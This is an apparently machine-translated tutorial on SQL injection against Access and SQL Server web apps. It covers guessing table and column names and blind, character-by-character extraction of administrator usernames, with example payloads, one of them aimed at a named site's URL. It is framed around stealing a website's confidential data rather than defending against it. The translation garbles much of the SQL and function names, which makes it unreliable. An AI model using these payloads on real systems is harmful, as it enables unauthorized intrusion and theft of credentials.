In the entry, we learned the judgment method of SQL injection, but truly to get the confidential content of the website, it is not enough. Next, we continue to learn how to get the content you want to get from the database, first, let's take a look at the general steps in SQL injection:
The first section, the general step of SQL injection
First, judge the environment, find an injection point, determine the database type, which is already told in the entry.
Secondly, according to the type of injection parameter, the original appearance of the SQL statement is reconstructed in the mind, and the parameter type is mainly divided into the following three:
(A) ID = 49 These injected parameters are digital, SQL statements, is as follows: SELECT * FROM table name Where field = 49 Injection parameters is ID = 49 and [Query Condition], that is, the generated statement: SELECT * From table name where field = 49 and [query condition]
(B) Class = Continuous argument This type of injection is a character type, and the SQL statement is generally approrated: SELECT * FROM table name where FROM table name WHERE field = 'consecutive' injection parameter is class = series' and [query criteria] and '' = ', That is, generating statement: SELECT * FROM table name Where field =' series of series' and "query conditions] and '' = ''
(C) When searching, there is no filter parameters, such as keyword = keyword, SQL statement original is as follows: SELECT * FROM Table Name Where FROM Table Name The parameter of the WHERE Field Like '% Injects is Keyword =' AND [Query Condition] and ' % 25 '=', that is, the generating statement: SELECT * FROM table name Where field Like '%' and [query conditions] and '%' = '%'
Next, replace the query condition into a SQL statement, guess the table name, for example:
ID = 49 and (select count (*) from admin)> = 0
If the page is the same as ID = 49, the additional condition is established, that is, the table admin exists, that is, it does not exist (please keep this method). So loop until you guessed the name.
After guess, replace count (*) into a count (field name), and specifically depends the word name.
Some people will say: There are some casual components here. If the name is very complicated, it will not have to play. It is very pair, this world does not exist 100% successful hacker technology, flies do not seamless eggs, no matter how many technologies, a few hackers, because others are not strict or not, the user is not confidential. I have to get it.
I have a little bit, saying it back, for SQL Server library, there is a way to let the program tell us the name and field name, we will introduce in the advanced article.
Finally, after the table name and column name are successful, use the SQL statement to get the value of the field, and the most common method is described below. Although this method is very slow, it must be feasible Methods.
We will give an example, known in the form of the username field, first of all, we take the first record, test length:
http://www.19cn.com/showdetail.asp?id=49 ;; And (SELECT TOP 1 LEN (UserName) from admin> 0 First Description Principle: If the UserName length of TOP 1 is greater than 0, the condition is established; Then,> 1,> 2,> 3, until the conditions are not established, such as> 7 is established,> 8 is not established, that is, Len (username) = 8
Of course, no one will be stupid from 0, 1, 2, 3 one test, how to look at each play. After obtaining the length of the username, the nth character is intercepted with MID (username, n, 1), and then ASC (MID (UserName, N, 1)) Gets the ASCII code, such as:
ID = 49 and (SELECT TOP 1 ASC (MID (username, 1, 1)) from admin)> 0
It is also the ASCII code of the first character using the step-by-step range, pay attention to the English and digital ASCII code between 1-128, can be used to speed up the guess, if the program test is written, the efficiency will have extreme Large improvement.
In the second section, SQL injection common functions
People with SQL language bases, the success rate is much higher than those who are not familiar during SQL injection. We must improve our SQL level, especially some common functions and orders.
Access: ASC (Character) SQLServer: Unicode (Character)
Role: Return to a character's ASCII code
Access: chr (Digital) SQLServer: nchar (number)
Role: In contrast to ASC, return characters according to ASCII code
Access: MID (String, N, L) SQLServer: Substring (String, N, L)
Role: Returns the string from the N-character starting a sub-string of the length L, ie the string between N to N L
Access: ABC (Digital) SQLServer: ABC (Digital)
Role: Return to the absolute value of the number (it will be used when guess the Chinese characters)
Access: a Between B and C SQLServer: a betWeen B and C
Role: Judgment a bound between B and C
Section III, Chinese processing method
In the injection of the Chinese characters are common things, some people want to fight back in the Chinese characters. In fact, as long as you know Chinese coding, "Chinese phobia" can quickly overcome.
Let's talk about a little common sense:
In Access, the Chinese ASCII code may have a negative number. After removing the negative, the absolute value is taken with ABS (), the Chinese characters are unchanged.
In SQL Server, Chinese ASCII is positive, but since it is a two-bit encoding of Unicode, the ASCII code cannot be obtained using a function ascii (), and the function unicode () must be used to return the corresponding Chinese character with the nchar function.
After understanding the two points above, if you think Chinese guess is actually almost the same as English? In addition to the function of use, it is important to pay attention to the specification, the method is nothing wrong.
